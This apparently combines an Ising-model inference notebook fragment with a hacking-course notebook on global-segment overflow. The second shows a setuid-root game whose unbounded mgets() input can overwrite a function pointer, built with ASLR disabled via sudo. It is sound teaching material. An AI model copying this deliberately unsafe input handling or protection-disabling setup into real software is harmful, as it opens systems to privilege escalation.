"def generate_seqs(n_var,n_seq,n_sample=30,g=1.0,w_true1=0.0):\n n_ops = n_var+int(n_var*(n_var-1)/2.0)\n #w_true = g*(np.random.rand(ops.shape[1])-0.5)/np.sqrt(float(n_var))\n if np.isscalar(w_true1):\n w_true = np.random.normal(0.,g/np.sqrt(n_var),size=n_ops)\n else:\n w_true = w_true1 \n samples = np.random.choice([1.0,-1.0],size=(n_seq*n_sample,n_var),replace=True)\n ops = operators(samples)\n #n_ops = ops.shape[1]\n\n sample_energy = energy_ops(ops,w_true)\n p = np.exp(sample_energy)\n p /= np.sum(p)\n out_samples = np.random.choice(np.arange(n_seq*n_sample),size=n_seq,replace=True,p=p)\n \n return w_true,samples[out_samples] #,p[out_samples],sample_energy[out_samples]",
"_____no_output_____"
],
[
"def hopfield_model(s):\n ops = operators(s)\n w = np.mean(ops,axis=0)\n #print('hopfield error ',nplin.norm(w-w_true))\n return w",
"_____no_output_____"
],
[
"def boltzmann_machine_exact(s,s_all,max_iter=150,alpha=5e-2,cov=False):\n n_seq,n_var = s.shape\n ops = operators(s)\n cov_inv = np.eye(ops.shape[1])\n ops_obs = np.mean(ops,axis=0)\n ops_model = operators(s_all)\n\n n_ops = ops.shape[1]\n \n np.random.seed(13)\n w = np.random.rand(n_ops)-0.5 \n for iterate in range(max_iter):\n energies_w = energy_ops(ops_model,w)\n probs_w = np.exp(energies_w)\n probs_w /= np.sum(probs_w)\n if iterate%10 == 0: \n #print(iterate,nplin.norm(w-w_true)) #,nplin.norm(spin_cov_w-spin_cov_obs))\n MSE = ((w-w_true)**2).mean()\n print(iterate,MSE)\n \n w += alpha*cov_inv.dot(ops_obs - np.sum(ops_model*probs_w[:,np.newaxis],axis=0))\n\n print('final',iterate,MSE)\n\n return w",
"_____no_output_____"
],
[
"def eps_machine(s,eps_scale=0.1,max_iter=151,alpha=0.1):\n MSE = np.zeros(max_iter)\n KL = np.zeros(max_iter)\n E_av = np.zeros(max_iter)\n \n n_seq,n_var = s.shape\n ops = operators(s)\n n_ops = ops.shape[1]\n cov_inv = np.eye(ops.shape[1])\n\n np.random.seed(13)\n w = np.random.rand(n_ops)-0.5 \n \n w_iter = np.zeros((max_iter,n_ops))\n for i in range(max_iter): \n #eps_scale = np.random.rand()/np.max([1.,np.max(np.abs(w))])\n \n energies_w = energy_ops(ops,w)\n probs_w = np.exp(energies_w*(eps_scale-1))\n z_data = np.sum(probs_w)\n probs_w /= z_data\n ops_expect_w = np.sum(probs_w[:,np.newaxis]*ops,axis=0)\n \n #if iterate%int(max_iter/5.0)==0:\n #E_exp = (probs_w*energies_w).sum()\n #KL[i] = -E_exp - np.log(z_data) + np.sum(np.log(np.cosh(w*eps_scale))) + n_var*np.log(2.)\n \n E_av[i] = energies_w.mean()\n MSE[i] = ((w-w_true)**2).mean()\n #print(RMSE[i])\n #print(eps_scale,iterate,nplin.norm(w-w_true),RMSE,KL,E_av)\n sec_order = w*eps_scale\n w += alpha*cov_inv.dot((ops_expect_w - sec_order)) \n #print('final ',eps_scale,iterate,nplin.norm(w-w_true)) \n #w_iter[i,:] = w\n \n return MSE,-E_av,w",
"_____no_output_____"
],
[
"max_iter = 100\n\nn_var,n_seq = 40,5000\ng = 1.0\n\nn_ops = n_var+int(n_var*(n_var-1)/2.0)\n\nw_true,seqs = generate_seqs(n_var,n_seq,g=g)\n#VP modification\nw_true1,seqs_test = generate_seqs(n_var,n_seq,g=g,w_true1=w_true)\n#eps_list = [0.25,0.3,0.35,0.4,0.45,0.5]\n#eps_list = [0.36,0.37,0.38,0.39,0.40,0.41,0.42,0.43,0.44]\neps_list = np.linspace(0.4,0.8,9)\nn_eps = len(eps_list)\nMSE = np.zeros((n_eps,max_iter))\nKL = np.zeros((n_eps,max_iter))\nE_av = np.zeros((n_eps,max_iter))\nw_eps = np.zeros((n_eps,n_ops))\nfor i,eps in enumerate(eps_list):\n print(eps)\n MSE[i,:],E_av[i,:],w_eps[i,:] = eps_machine(seqs,eps_scale=eps,max_iter=max_iter)",
"0.4\n0.45\n0.5\n0.55\n0.6000000000000001\n0.65\n0.7000000000000001\n0.75\n0.8\n"
],
[
"plt.plot(eps_list,E_av[:,-1])",
"_____no_output_____"
],
[
"# optimal eps\nieps = np.argmax(E_av[:,-1])\nprint('optimal eps:',ieps,eps_list[ieps])\n\nw = w_eps[ieps]",
"optimal eps: 5 0.65\n"
],
[
"plt.plot(w_true,w,'ro')\nplt.plot(w_true,w_true1,'ko',alpha=0.1)\nplt.plot([-0.6,0.6],[-0.6,0.6])",
"_____no_output_____"
],
[
"# # Z_all_true\n# s_all = np.asarray(list(itertools.product([1.0, -1.0], repeat=n_var)))\n# ops_all = operators(s_all)\n\n# E_all_true = energy_ops(ops_all,w_true)\n# P_all_true = np.exp(E_all_true)\n# Z_all_true = P_all_true.sum()\n# np.log(Z_all_true)",
"_____no_output_____"
],
[
"# random configs\n#n_random = 10000\n#i_random = np.random.choice(s_all.shape[0],n_random)\n#s_random = s_all[i_random]\n#ops_random = operators(s_random)\n\n#E_true = energy_ops(ops_random,w_true)\n#P_true = np.exp(E_true)\n\n#p0 = P_true/Z_all_true\n\n#VP modification - look at test seqs that are representative of the actual distribution\nops_test = operators(seqs_test)\n#E_true_test = energy_ops(ops_test,w_true)\n#P_true_test = np.exp(E_true_test)\n\n#p0_test = P_true_test/Z_all_true",
"_____no_output_____"
],
[
"seq_unique,i_seq,seq_count1 = np.unique(seqs,return_inverse=True,return_counts=True,axis=0)\nseq_count = seq_count1[i_seq]",
"_____no_output_____"
],
[
"#VP modification\nseq_unique_test,i_seq_test,seq_count1_test = np.unique(seqs_test,return_inverse=True,return_counts=True,axis=0)\nseq_count_test = seq_count1_test[i_seq_test]",
"_____no_output_____"
],
[
"def partition_data(seqs,eps=0.999): \n ops = operators(seqs)\n energies_w = energy_ops(ops,w)\n\n probs_w = np.exp(energies_w*(eps-1))\n z_data = np.sum(probs_w)\n probs_w /= z_data\n\n x = np.log(seq_count*probs_w).reshape(-1,1)\n y = eps*energies_w.reshape(-1,1)\n\n reg = LinearRegression().fit(x,y)\n score = reg.score(x,y)\n b = reg.intercept_[0]\n m = reg.coef_[0][0] # slope\n\n # set slope = 1\n lnZ_data = (eps*energies_w).mean() - (np.log(seq_count*probs_w)).mean()\n\n # exact (to compare)\n #probs_all = np.exp(eps*energies_all)\n #Z_all = np.sum(probs_all)\n #lnZ_all[i] = np.log(Z_all)\n\n print(eps,score,m,b,lnZ_data)\n \n return lnZ_data",
"_____no_output_____"
],
[
"#lnZ_data = partition_data(seqs,eps=0.9999)\n#print(lnZ_data)\n\n# Z_infer:\n#Z_infer = np.exp(lnZ_data) ### NOTE\n\n#E_infer = energy_ops(ops_random,w)\n#P_infer = np.exp(E_infer)\n#p1 = P_infer/Z_infer\n\n#plt.plot(-np.log(p0),-np.log(p1),'ko',markersize=3)\n#plt.plot([5,35],[5,35])",
"_____no_output_____"
],
[
"# Z_direct at eps = 1 : unique\nops_unique = operators(seq_unique)\n#energies_w = energy_ops(ops_unique,w)\n\n#probs_w = np.exp(energies_w)\n#Z_direct = (probs_w/seq_count1).mean()\n#lnZ_direct = np.log(Z_direct) + np.log(n_seq)\n#print(lnZ_direct)",
"_____no_output_____"
],
[
"# VP modification\nfreq_count1 = seq_count1/n_seq\nfreq_count1_test = seq_count1_test/n_seq\nops_unique_test = operators(seq_unique_test)\n\nfor i,eps in enumerate(eps_list):\n energies_w = energy_ops(ops_unique,w_eps[i,:])\n energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])\n alpha = 1.5\n lnZ_unique = -np.mean(freq_count1**alpha * (-energies_w + np.log(freq_count1)))/np.mean(freq_count1**alpha )\n E_mean_f = -np.sum(energies_w*freq_count1)\n probs_test = np.exp(energies_w_test-lnZ_unique)\n print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))",
"0.4 -28.450699869431947 33.79179142799946 -5.341091558567516 9.107327272477223\n0.45 -26.411333954044856 31.643131839800873 -5.231797885756016 1.383283956809521\n0.5 -24.957633710310546 30.146438929416696 -5.1888052191061504 0.2386077044108112\n0.55 -23.991541417980947 29.205220085526673 -5.213678667545725 0.045116645258484925\n0.6000000000000001 -23.4452122187589 28.753171864887115 -5.307959646128214 0.009597238379181909\n0.65 -23.281425497754114 28.756122232004603 -5.4746967342504895 0.0029238374535567307\n0.7000000000000001 -23.503254497055988 29.229054796262627 -5.7258002992066395 0.001809193482092694\n0.75 -24.16696006941197 30.256691606801148 -6.089731537389177 0.0017589491691205991\n0.8 -25.412708364472696 32.03873902428966 -6.626030659816966 0.0018618880217881298\n"
],
[
"# all obs\nops = operators(seqs)\nenergies_w = energy_ops(ops,w)\n\nprobs_w = np.exp(energies_w)\nZ_direct = (probs_w/seq_count).mean()\nlnZ_direct = np.log(Z_direct) + np.log(n_seq)\nprint(lnZ_direct)",
"29.03757238120805\n"
],
[
"# Z from optimal eps\neps0 = eps_list[ieps]\nprint(eps0)\n\nops_unique = operators(seq_unique)\nenergies_w = energy_ops(ops_unique,w)\nprobs_w = np.exp(eps0*energies_w)\n\nZ1 = (probs_w).sum()\nZ2 = (seq_count1*np.exp((eps0-1)*energies_w)).sum()\n\nlnZ = np.log(Z1*n_seq/Z2)\nprint(lnZ)",
"0.65\n26.100750795410487\n"
],
[
"seq_unique.shape[0]",
"_____no_output_____"
],
[
"# VP modification -1/13/2020\ndef free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2e-1,toler=0.1):\n energies_w = energy_ops(ops_uniq,w)\n log_f_count = np.log(f_count_uniq)\n entropy = - np.sum(f_count_uniq*log_f_count)\n E_mean_f = -np.sum(energies_w*f_count_uniq)\n F_0 = E_mean_f - entropy\n F_gamma = F_0\n update = np.inf\n while update > toler:\n F_gamma_new = F_0 + np.sum(f_count_uniq*np.sinh(gamma*(F_gamma + energies_w - log_f_count)))/gamma\n print((F_gamma + energies_w - log_f_count)[3:7])\n update = np.abs(F_gamma - F_gamma_new)\n F_gamma = F_gamma_new\n return F_gamma\n\ndef free_energy_improved(f_count_uniq,ops_uniq,w,gamma=0.02,toler=5e-2):\n F_true = 4*(free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=gamma,toler=toler)-\\\n 0.25*free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2*gamma,toler=toler))/3.0\n return F_true",
"_____no_output_____"
],
[
"# VP modification - 1/13/2020\n# try to get free energy by integrating mean energy over temperature\ndef free_energy_integrated(f_count_uniq,ops_uniq,w,d_beta=0.1,obs=True):\n E_mean_f = 0.0\n for i in range(int(1.0/d_beta)):\n bet = (i+0.5)*d_beta\n if obs: \n E_mean_f += -np.sum(energies_w*f_count_uniq**bet)/np.sum(f_count_uniq**bet) \n else:\n E_mean_f += -np.sum(energies_w*np.exp(energies_w*bet))/np.sum(np.exp(energies_w*bet))\n return E_mean_f*d_beta",
"_____no_output_____"
],
[
"# VP modification -1/13/2020\n# try to find free energy with the upper and lower bounds\nfreq_count1 = seq_count1/n_seq\nfreq_count1_test = seq_count1_test/n_seq\nops_unique_test = operators(seq_unique_test)\n\nE_mean_f_list = np.zeros(len(eps_list))\nlnZ_unique_list = np.zeros(len(eps_list))\nlnZ_unique_E_mean_list = np.zeros(len(eps_list))\nX_squared_list = np.zeros(len(eps_list))\nX_squared_list_train = np.zeros(len(eps_list))\n\nfor i,eps in enumerate(eps_list):\n energies_w = energy_ops(ops_unique,w_eps[i,:])\n energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])\n # lnZ_unique = -free_energy_improved(freq_count1,ops_unique,w_eps[i,:],gamma=0.04,toler=1e-1)\n lnZ_unique = -free_energy_integrated(freq_count1,ops_unique,w_eps[i,:],obs=False)\n E_mean_f = -np.sum(energies_w*freq_count1)\n E_mean_f_test = -np.sum(energies_w_test*freq_count1_test)\n probs_test = np.exp(energies_w_test-lnZ_unique)\n probs_train = np.exp(energies_w-lnZ_unique)\n\n print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,-lnZ_unique - E_mean_f_test,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))\n\n # 2020.01.13: Tai added \n E_mean_f_list[i] = E_mean_f\n lnZ_unique_list[i] = lnZ_unique\n lnZ_unique_E_mean_list[i] = -lnZ_unique - E_mean_f\n \n X_squared_list[i] = np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test) \n X_squared_list_train[i] = np.mean(((probs_train-freq_count1)**2)/freq_count1) ",
"0.4 -28.450699869431947 29.816594450813337 -1.36589458138139 0.3358916621199306 25908.82004046722\n0.45 -26.411333954044856 26.82372061693351 -0.4123866628886539 1.1397538526115163 21399.52803132499\n0.5 -24.957633710310546 24.70822714734211 0.249406562968435 1.6280225543498048 12874.249005683449\n0.55 -23.991541417980947 23.387862814612426 0.6036786033685217 1.76958943270105 5299.760983106453\n0.6000000000000001 -23.4452122187589 22.734919303666164 0.7102929150927366 1.6119217370367416 1661.1853915422469\n0.65 -23.281425497754114 22.646421828421936 0.6350036693321783 1.2094361305686725 452.81907172973024\n0.7000000000000001 -23.503254497055988 23.10275649508111 0.40049800197487784 0.5632846367074862 111.73308206944175\n0.75 -24.16696006941197 24.18340623950034 -0.01644617008836846 -0.39303930917712293 22.590747412816036\n0.8 -25.412708364472696 26.10799225689387 -0.6952838924211733 -1.8252947530261245 2.7825856392974826\n"
],
[
"nx,ny = 1,6\nfig, ax = plt.subplots(ny,nx,figsize=(nx*3,ny*2.2))\n\nax[0].plot(eps_list, MSE[:,-1],'ko-')\nax[1].plot(eps_list, E_mean_f_list,'ko-')\nax[2].plot(eps_list, lnZ_unique_list,'ko-')\nax[3].plot(eps_list, lnZ_unique_E_mean_list,'ko-')\nax[4].plot(eps_list, X_squared_list,'ko-')\nax[5].plot(eps_list, X_squared_list_train,'ko-')\n\nax[0].set_ylabel('MSE')\nax[1].set_ylabel('Energy')\nax[2].set_ylabel('LnZ')\nax[3].set_ylabel('-LnZ-Energy')\nax[4].set_ylabel('X_sequared_test')\nax[5].set_ylabel('X_sequared_train')\n\n\nplt.tight_layout(h_pad=0.5, w_pad=0.6)\n#plt.savefig('fig1.pdf', format='pdf', dpi=100)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2999fa4149089d6c5857e6fff18239d4693a1b | 63,515 | ipynb | Jupyter Notebook | GlobalSegmentOverflow.ipynb | rambasnet/Hacking-CPP-Notebooks | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2020-12-30T22:19:06.000Z | 2020-12-30T22:19:06.000Z | GlobalSegmentOverflow.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | null | null | null | GlobalSegmentOverflow.ipynb | rambasnet/SystemSecurity | 403371415f406204701b74667502b642c18390af | [
"MIT"
] | 1 | 2021-08-30T20:21:43.000Z | 2021-08-30T20:21:43.000Z | 35.168882 | 191 | 0.520727 | [
[
[
"# Global Segment Overflow\n- recall function pointers are pointers that store addresses of functions/code\n - see [Function-Pointers notebook](./Function-Pointers.ipynb) for a review\n- function pointers can be overwritten using overflow techniques to point to different code/function\n\n\n## Lucky 7 game\n- various luck-based games that're favored to the house\n- program uses a function pointer to remember the last game played by the user\n- the last game function's address is stored in the **User** structure\n- player object is declared as an uninitialized global variable\n - meaning the memory is allocated in the **bss** segment\n- seteuid multi-user program that stores player's data in /var folder\n- only root or sudo user can access players' info stored in /var folder\n- each player is identified by the system's user id\n- examine and compile and run game programs in demos/other_overflow/ folder\n- game is divided into one header file and 2 .cpp files\n- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission\n- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`",
"_____no_output_____"
]
],
[
[
"! cat demos/other_overflow/main.cpp",
"#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <time.h>\r\n#include <stdlib.h>\r\n#include <unistd.h> //getuid()\r\n#include <sys/types.h> // getuid()\r\n#include <iostream>\r\n#include \"lucky7.h\"\r\n\r\nchar DATAFILE[] = \"/var/lucky7.txt\"; // File to store players data\r\n\r\nusing namespace std;\r\n\r\n// Global variables\r\nUser player; // Player struct\r\n\r\nint main(int argc, char* argv[]) {\r\n int choice, last_game;\r\n\r\n if(not read_player_data(DATAFILE, player)) // Try to read player data from file.\r\n register_new_player(DATAFILE, player); // If there is no data, register a new player.\r\n\r\n do {\r\n choice = get_choice(player);\r\n if (choice < 4) {\r\n if (choice != last_game) {\r\n switch(choice) {\r\n case 1:\r\n cout << \"\\n~*~*~ Lucky 7 ~*~*~\\nCosts 10 credits to play this game.\\n\"\r\n << \"Machine will generate 1 random numbers each between 1 and 9.\\n\"\r\n << \"If the number is 7, you win a jackpot of 10 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n\" << flush << endl;\r\n player.current_game = lucky7;\r\n break;\r\n case 2:\r\n cout << \"\\n~*~*~ Lucky 777 ~*~*~\\nCosts 50 credits to play this game.\\n\"\r\n << \"Machine will generate 3 random numbers each between 1 and 9.\\n\"\r\n << \"If all 3 numbers are 7, you win a jackpot of 100 THOUSAND\\n\"\r\n << \"If all 3 numbers match, you win 10 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n Enter to continue...\" << flush << endl; \r\n player.current_game = lucky777;\r\n break;\r\n case 3:\r\n cout << \"\\n~*~*~ Lucky 77777 ~*~*~\\nCosts 100 credits to play this game.\\n\"\r\n << \"Machine will generate 5 random numbers each between 1 and 9.\\n\"\r\n << \"If all 5 numbers are 7, you win a jackpot of 1 MILLION\\n\"\r\n << \"If all 5 numbers match, you win 100 THOUSAND\\n\"\r\n << \"Otherwise, you lose.\\n Enter to continue...\" << flush << endl;\r\n player.current_game = lucky77777;\r\n break;\r\n }\r\n last_game = choice;\r\n } \r\n play_the_game();\r\n }\r\n else if (choice == 4)\r\n show_credits(player);\r\n else if (choice == 5) {\r\n change_username();\r\n update_player_data(DATAFILE, player);\r\n printf(\"Your name has been changed.\\n\\n\");\r\n }\r\n else if (choice == 6)\r\n reset_credit(DATAFILE, player);\r\n \r\n //cin.get();\r\n } while(choice !=7 );\r\n printf(\"\\nThanks for playing! Good Bye.\\n\");\r\n}\r\n\r\n\r\n// This function simply awards the jackpot for the Pick a Number game\r\nvoid jackpot10K() {\r\n printf(\"*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*\\n\");\r\n printf(\"Congratulations!\\n You have won the jackpot of 10000 (10K) credits!\\n\");\r\n player.credits += 10000;\r\n}\r\n\r\n// This function simply awards the jackpot for the lucky 777 game\r\nvoid jackpot100K() {\r\n printf(\"*+*+*+*+*+* JACKPOT 100 THOSAND *+*+*+*+*+*\\n\");\r\n printf(\"Congratulations!!!!\\n You have won the jackpot of 100000 (100K) credits!\\n\");\r\n player.credits += 100000;\r\n}\r\n\r\n// This function simply awards the jackpot for the lucky 77777 game\r\nvoid jackpot1M() {\r\n printf(\"*+*+*+*+*+* JACKPOT 1 MILLION *+*+*+*+*+*\\n\");\r\n printf(\"!!!!Congratulations!!!!You have won the jackpot of 100000 (1M) credits!\\n\");\r\n player.credits += 1000000;\r\n}\r\n\r\nbool has_credits() {\r\n if (player.current_game == lucky7 and player.credits >= 10) {\r\n player.credits -= 10;\r\n return true;\r\n }\r\n\r\n if (player.current_game == lucky777 and player.credits >= 50) {\r\n player.credits -= 50;\r\n return true;\r\n }\r\n\r\n if (player.current_game == lucky77777 and player.credits >= 100) {\r\n player.credits -= 100;\r\n return true;\r\n }\r\n\r\n return false;\r\n}\r\n\r\n// This function contains a loop to allow the current game to be\r\n// played again. It also writes the new credit totals to file\r\n// after each game is played.\r\nvoid play_the_game() { \r\n char again;\r\n int result;\r\n do {\r\n if (not has_credits()) {\r\n cout << \"Sorry, you're out of credit.\\nReset your credit to 500 to play again\\n\";\r\n break;\r\n }\r\n printf(\"\\n[DEBUG] current_game pointer 0x%08x\\n\", player.current_game);\r\n result = player.current_game();\r\n if( result == 1) // if won, give jackport\r\n jackpot10K();\r\n else if (result == 2)\r\n jackpot100K();\r\n else if (result == 3)\r\n jackpot1M();\r\n else\r\n cout << \"Sorry! Better luck next time...\\n\";\r\n\r\n printf(\"\\nYou have %u credits\\n\", player.credits);\r\n update_player_data(DATAFILE, player); // Write the new credit total to file.\r\n printf(\"Would you like to play again? [y/n]: \");\r\n cin >> again;\r\n cin.ignore(100, '\\n');\r\n } while(again == 'y' or again == 'Y');\r\n}\r\n\r\nvoid change_username() {\r\n printf(\"\\nChange user name\\n\");\r\n cout << \"Enter your new name:\\n\";\r\n mgets(player.name);\r\n}"
],
[
"! cat demos/other_overflow/lucky7.cpp",
"#include <stdio.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <time.h>\r\n#include <stdlib.h>\r\n#include <unistd.h> //getuid()\r\n#include <sys/types.h> // getuid()\r\n#include <iostream>\r\n#include <fstream>\r\n#include <iomanip>\r\n#include <filesystem> // file system specific permission\r\n\r\n#include \"lucky7.h\"\r\n\r\nusing namespace std;\r\nnamespace fs = std::filesystem;\r\n\r\nint get_choice(User &player) {\r\n size_t choice = 0;\r\n do{\r\n //system(\"clear\");\r\n cout << \"-=[ Lucky 7 Game Menu ]=-\\n\";\r\n cout << \"1 - Play Lucky 7 game\\n\";\r\n cout << \"2 - Play Lucky 777 game\\n\";\r\n cout << \"3 - Play Lucky 77777 game\\n\";\r\n cout << \"4 - View your total credits\\n\";\r\n cout << \"5 - Change your user name\\n\";\r\n cout << \"6 - Reset your account at 500 credits\\n\";\r\n cout << \"7 - Quit\\n\";\r\n printf(\"[Name: %s]\\n\", player.name);\r\n printf(\"[You have %u credits] -> \", player.credits);\r\n cout << \"Enter your choice [1-7]: \";\r\n cin >> choice;\r\n if(cin.fail())\r\n cin.clear();\r\n\r\n if ((choice < 1) || (choice > 7))\r\n cerr << \"The number \" << choice << \" is an invalid selection.\\n\\n\";\r\n else \r\n return choice;\r\n } while(true);\r\n}\r\n\r\n// This is the new user registration function.\r\n// It will create a new player account and append it to the file\r\nvoid register_new_player(char * data_file, User &player) { \r\n cout << \"-=-={ New Player Registration }=-=-\\n\";\r\n cout << \"Enter your name: \";\r\n mgets(player.name);\r\n player.uid = getuid();\r\n player.credits = 500;\r\n\r\n ofstream fout(data_file, ios::app);\r\n if(not fout) {\r\n cerr << \"Fatal error in register_new_player() while opening \" << data_file << \" file\\n\";\r\n exit(-1);\r\n }\r\n \r\n //fout << player.uid << \" \" << player.credits << \" \" << player.name << endl;\r\n fout << left << setw(10) << player.uid << setw(15) << player.credits << setw(100) << player.name << endl;\r\n fs::permissions(data_file, fs::perms::group_read|fs::perms::others_read, fs::perm_options::remove);\r\n fout.close();\r\n printf(\"\\nWelcome to the Lucky 7 Game %s.\\n\", player.name);\r\n printf(\"You have been given %u credits.\\n\", player.credits);\r\n}\r\n\r\n// This function writes the current player data to the file.\r\n// It is used primarily for updating the credits after games.\r\nvoid update_player_data(char * data_file, User &player) {\r\n int read_uid, credits;\r\n string name;\r\n fstream file(data_file, ios::out|ios::in);\r\n streampos position;\r\n if (!file) {\r\n cerr << \"Fatal error opening file \" << data_file << endl;\r\n exit(-1);\r\n }\r\n\r\n while(file >> read_uid) { // Loop until correct uid is found\r\n if (read_uid == player.uid) // found our line\r\n {\r\n file.seekg(-4, ios::cur);\r\n file << left << setw(10) << player.uid << setw(15) << player.credits << setw(100) << player.name << endl;\r\n break;\r\n }\r\n else {\r\n file >> credits;\r\n getline(file, name);\r\n }\r\n }\r\n file.close();\r\n}\r\n\r\nchar * mgets(char *dst) {\r\n char *ptr = dst;\r\n int ch; \r\n\t/* skip leading white spaces */ \r\n while (true) {\r\n ch = getchar();\r\n if (ch == ' ' or ch == '\\t' or ch == '\\n') continue;\r\n else break;\r\n }\r\n\r\n /* now read the rest until \\n or EOF */ \r\n while (true) {\r\n *(ptr++) = ch; \r\n ch = getchar();\r\n if (ch == '\\n' or ch == EOF) break;\r\n }\r\n *(ptr) = 0;\r\n return dst;\r\n}\r\n\r\nvoid show_credits(const User & player) {\r\n cout << setw(30) << setfill('=') << \"\\n\";\r\n cout << \"Name: \" << player.name << endl;\r\n cout << \"Credits: \" << player.credits << endl;\r\n cout << setw(20) << \"\\n\";\r\n cout << setfill(' ');\r\n}\r\n\r\nvoid printNumber(int randNumber) {\r\n int maxRoll = 10000;\r\n int num;\r\n for(int i=0; i<maxRoll; i++) {\r\n num = i%9+1;\r\n cout << num << flush;\r\n sleep(0.25);\r\n cout << \"\\b\" << flush;\r\n }\r\n cout << randNumber << \" \" << flush;\r\n \r\n}\r\n\r\n// win jackpot of 10K if random number 7 is generated\r\nint lucky7() {\r\n cout << \"the random number is: \" << flush;\r\n int num = get_random_number(9);\r\n printNumber(num);\r\n cout << endl;\r\n if (num == 7) return 1; //win jackpot\r\n else return 0; // loss\r\n}\r\n\r\n// win jackpot of 100K for 3 777 numbers\r\nint lucky777() {\r\n cout << \"3 random numers are: \" << flush;\r\n int num1 = get_random_number(9);\r\n printNumber(num1);\r\n\r\n int num2 = get_random_number(9);\r\n printNumber(num2);\r\n\r\n int num3 = get_random_number(9);\r\n printNumber(num3);\r\n\r\n cout << endl;\r\n if (num1 == 7 and num2 == 7 and num3 == 7) return 2; // jackpot\r\n else if (num1 == num2 and num2 == num3) return 1; // normal win\r\n else return 0;\r\n}\r\n\r\n// win Jackpot of 1M if all 5 random numbers are 77777\r\nint lucky77777() {\r\n cout << \"5 random numers are: \" << flush;\r\n int num1 = get_random_number(9);\r\n printNumber(num1);\r\n\r\n int num2 = get_random_number(9);\r\n printNumber(num2);\r\n\r\n int num3 = get_random_number(9);\r\n printNumber(num3);\r\n\r\n int num4 = get_random_number(9);\r\n printNumber(num4);\r\n\r\n int num5 = get_random_number(9);\r\n printNumber(num5);\r\n cout << endl;\r\n if (num1 == 7 and num2 == 7 and num3 == 7 and num4 == 7 and num5 ==7) return 3;\r\n else if (num1 == num2 and num2 == num3 and num3 == num4 and num4 == num5) return 2;\r\n else return 0;\r\n}\r\n\r\nvoid reset_credit(char * datafile, User & player) {\r\n player.credits = 500;\r\n update_player_data(datafile, player);\r\n}\r\n\r\nunsigned int get_random_number(int max) {\r\n srand(time(0)); // Seed the randomizer with the current time.\r\n int num = rand()%max+1;\r\n return num;\r\n}\r\n\r\nvoid rstrip(string &line) {\r\n int last_space = line.length()-1;\r\n while(line[last_space] == ' ') --last_space;\r\n line.erase(line.begin()+last_space+1, line.end());\r\n}"
]
],
[
[
"- change current working directory to other_overflow folder where the program and Makefile are\n- compile using the Makefile",
"_____no_output_____"
]
],
[
[
"%cd ./demos/other_overflow",
"/home/kali/projects/EthicalHacking/demos/other_overflow\n"
],
[
"! echo kali | sudo -S make",
"[sudo] password for kali: g++ -g -Wall -m32 -std=c++17 -fno-stack-protector -z execstack -no-pie lucky7.cpp main.cpp -o lucky7.exe \n# must run make with sudo to disable randomaize_va_space\necho 0 | tee /proc/sys/kernel/randomize_va_space\n0\nsudo chown root:root lucky7.exe \nsudo chmod +s lucky7.exe \n"
],
[
"# program uses /var/lucky7.txt to store player's information\n# let's take a look into it\n! echo kali | sudo -S cat /var/lucky7.txt\n# userid credits palaer's_full_name",
"[sudo] password for kali: 1000 10220 John Smith A�\u0004\b\r\n"
],
[
"# if file exists, delete it to start fresh\n! echo kali | sudo -S rm /var/lucky7.txt",
"[sudo] password for kali: "
],
[
"! ls -al /var/lucky7.txt",
"ls: cannot access '/var/lucky7.txt': No such file or directory\r\n"
],
[
"! ls -l lucky7.exe",
"-rwsr-sr-x 1 root root 257728 Jul 21 10:30 lucky7.exe\r\n"
]
],
[
[
"### play the interactive game\n- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021\n- Use Terminal to play the program; follow the menu provided by the program to play the game\n- press `CTRL-Z` to temporarily suspend (put it in background) the current process\n- enter `fg` command to bring the suspended program to fore ground\n\n```bash\n┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]\n└─$ ./lucky7.exe \nDatabase file doesn't exist: /var/lucky7.txt\n-=-={ New Player Registration }=-=-\nEnter your name: John Smith\n \nWelcome to the Lucky 7 Game John Smith. \nYou have been given 500 credits.\n-=[ Lucky 7 Game Menu ]=-\n1 - Play Lucky 7 game\n2 - Play Lucky 777 game\n3 - Play Lucky 77777 game\n4 - View your total credits\n5 - Change your user name\n6 - Reset your account at 500 credits\n7 - Quit\n[Name: John Smith]\n[You have 500 credits] -> Enter your choice [1-7]: 2\n\n~*~*~ Lucky 777 ~*~*~\nCosts 50 credits to play this game.\nMachine will generate 3 random numbers each between 1 and 9.\nIf all 3 numbers are 7, you win a jackpot of 100 THOUSAND\nIf all 3 numbers match, you win 10 THOUSAND\nOtherwise, you lose.\n Enter to continue...\n\n[DEBUG] current_game pointer 0x0804b1cd\n3 random numers are: 4 3 4 \nSorry! Better luck next time...\n\nYou have 450 credits\nWould you like to play again? [y/n]:\n```",
"_____no_output_____"
],
[
